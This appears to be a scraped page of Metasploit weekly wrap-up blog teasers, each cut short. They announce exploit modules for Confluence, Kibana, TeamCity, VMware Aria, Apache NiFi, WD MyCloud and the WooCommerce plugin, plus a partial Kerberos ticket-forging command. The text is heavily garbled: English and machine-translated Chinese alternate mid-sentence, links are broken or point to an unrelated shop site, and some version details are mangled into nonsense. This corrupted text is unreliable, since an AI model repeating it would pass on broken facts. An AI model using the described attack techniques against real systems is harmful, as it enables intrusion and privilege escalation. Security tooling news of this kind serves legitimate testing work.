4 min
Metasploit
Metasploit每周总结
这种特权升级迅速升级
This release features a module leveraging CVE-2023-22515
[http://shop.airportcarsonline.com/blog/post/2023/10/04/etr-cve-2023-22515-zero-day-privilege-escalation-in-confluence-server-and-data-center/]
, a vulnerability in Atlassian’s on-premises Confluence Server first listed as a
privilege escalation, but quickly recategorized as a “broken access control”
与10的CVSS分数. The exploit itself is very simple and easy to use so
当
3 min
Metasploit
Metasploit每周总结
基巴纳的污染
本周,贡献者h00die [http://github].[h00die]增加了一个模块
leverages a prototype pollution bug in Kibana prior to version 7.6.3.
Particularly, this issue is within the Upgrade Assistant and enables an attacker
执行任意代码. This vulnerability can be triggered by sending a
设置新构造函数的查询.prototype.sourceURL直接到Elastic或
通过使用Kibana提交相同的查询. 注意,Kibana需要这样做
重新启动或等待c
2 min
Metasploit
Metasploit每周总结
新增模块内容(3)
LDAP登录扫描器
作者:迪恩·韦尔奇
Type: Auxiliary
拉取请求:#18197 [http://github ..com/rapid7/metasploit-framework/pull/18197]
由dwelch-r7 [http://github]贡献.com/dwelch-r7]
路径:扫描仪/ ldap / ldap_login
Description: This PR adds a new login scanner module for LDAP. Login scanners
are the classes that provide functionality for testing authentication against
各种不同的协议和机制. 此LDAP登录扫描程序支持
多种类型的aut
3 min
Metasploit
Metasploit每周总结
TeamCity authentication bypass and remote code execution
This week’s Metasploit release includes a new module for a critical
authentication bypass in JetBrains TeamCity CI/CD Server. All versions of
2023版本之前的TeamCity.05.4个国家容易受到这个问题的影响. The
vulnerability was originally discovered by SonarSource, and the Metasploit
module was developed by Rapid7’s Principal Security Researcher Stephen Fewer who
additionally published a technical analysis on AttackerKB for CVE-2023-4279
4 min
Metasploit
Metasploit每周总结
改进机票锻造
Metasploit’s admin/kerberos/forge_ticket module has been updated to work with
Server 2022. In Windows Server 2022, Microsoft started requiring additional new
PAC elements to be present - the PAC requestor and PAC attributes. The newly
forged tickets will have the necessary elements added automatically based on the
user提供域SID和用户RID. For example:
msf6 auxiliary(admin/kerberos/forge_ticket) > run aes_key=4a52b73cf37ba06cf693c40f352e2f4d2002ef61f6031f649
4 min
Metasploit
Metasploit每周总结
Flask Cookies
This week includes two modules related to Flask cookie signatures. One is
specific to Apache Superset where session cookies can be resigned, allowing an
attacker to elevate their privileges and dump the database connection strings.
While adding this functionality, community member h00die
[http://github.com/h00die] also added a module for generically working with the
Flask使用的默认会话cookie. 这个通用模块
辅助/收集/ python_flask_cookie_signer
[http://git
2 min
Metasploit
Metasploit每周总结
新增模块内容(4)
Roundcube TimeZone Authenticated File Disclosure
作者:joel, stonepresto和thomascube
Type: Auxiliary
拉取请求:#18286 [http://github ..com/rapid7/metasploit-framework/pull/18286]
由cudalac [http://github]贡献.com/cudalac]
路径:辅助/收集/ roundcube_auth_file_read
攻击者kb参考:CVE-2017-16651
[http://attackerkb.com/topics/he57fr8fb4/cve - 2017 - 16651?referrer=blog]
Description: This PR adds a module to retrieve an arbitrary file on hosts
run
2 min
Metasploit
Metasploit每周总结
南瓜香料模块
Here in the northern hemisphere, fall is on the way: leaves changing, the air
growing crisp and cool, and some hackers changing the flavor of their caffeine.
This release features a new exploit module targeting Apache NiFi as well as a
新的和改进的库与它交互.
新增模块内容(1)
Apache NiFi H2 Connection String Remote Code Execution
作者:Matei“Mal”Badanoiu和h00die
Type: Exploit
拉取请求:#18257 [http://github ..com/rapid7/metasploit-fra
3 min
Metasploit
Metasploit每周总结
权力(壳)点
This week’s new features and improvements start with two new exploit modules
利用cve - 2023 - 34960
[http://attackerkb.com/topics/vvjpmespup/cve - 2023 - 34960?引用博客]Chamilo =
versions 1.11.18及以下和CVE-2023-26469
[http://attackerkb.com/topics/rt7g6vyw1l/cve - 2023 - 26469?介绍人=博客]
Jorani 1.0.0. 像cve - 2023 - 34960
[http://attackerkb.com/topics/vvjpmespup/cve - 2023 - 34960?,我也是。
有时我觉得自己被ppt攻击了.
我们也有几个进口商
2 min
Metasploit
Metasploit每周总结
Meterpreter测试
This week’s release adds new payload tests to our automated test suite. This is
intended to help the team and community members identify issues and behavior
变更前的差异. 有效载荷运行在各种不同的
platforms including Windows, Linux, and OS X each of which has multiple
Meterpreter implementations available that are now tested to help ensure
consistency. This should improve payload stability and make testing easier for
社区成员
2 min
Metasploit
Metasploit每周总结
一个新的元数据库RCE模块, updates to the citrix_formssso_target_rce module for CVE-2023-3519 to include two new targets, Citrix ADC (NetScaler.1-65.25, and 12.1-64.17, and more
4 min
Metasploit
Metasploit每周总结
用这个新的云漏洞在天空中飞行!
This week, a new module was added that takes advantage of both authentication
bypass and command injection in certain versions of Western Digital's MyCloud
hardware. 由社区成员Erik Wynter提交
[http://github.com/ErikWynter], this module gains access to the target,
attempts to bypass authentication, verifies whether that was successful, then
使用根权限执行负载. 这适用于之前的版本
2.30.196, and offer
3 min
Metasploit
Metasploit每周总结
VMware产品中未经认证的RCE
This week, community contributor h00die [http://github.[h00die]添加了一个
exploit module that leverages a command injection vulnerability in VMWare Aria
Operations for Networks, formerly known as vRealize Network Insight. Versions
6.2 to 6.10个漏洞(CVE-2023-20887)
[http://attackerkb.com/topics/gxz1cuyfh2/cve - 2023 - 20887?referrer=blog]). A
remote attacker could abuse the Apache Thrift RPC interface by sending specially
精心制作的数据,并得到解锁
2 min
Metasploit
Metasploit每周总结
This week's weekly wrapup includes two new Metasploit modules - Piwigo Gather Credentials via SQL Injection ( CVE-2023-26876 ) and Openfire authentication bypass with RCE plugin (CVE-2023-32315)
2 min
Metasploit
Metasploit每周总结
Authentication bypass in Wordpress插件 WooCommerce Payments
This week's Metasploit release includes a module for CVE-2023-28121 by h00die
[http://github.com/h00die]. 这个模块可以用于任何wordpress
instance that uses WooCommerce payments < 5.6.1. 这个模块利用了一个授权
by-pass vulnerability in the WooCommerce WordPress plugin. 你可以简单地加上a
header to execute the bypass and use the API to create a new admin user in
Wordpress.
新增模块内容(3)
Wordpress插件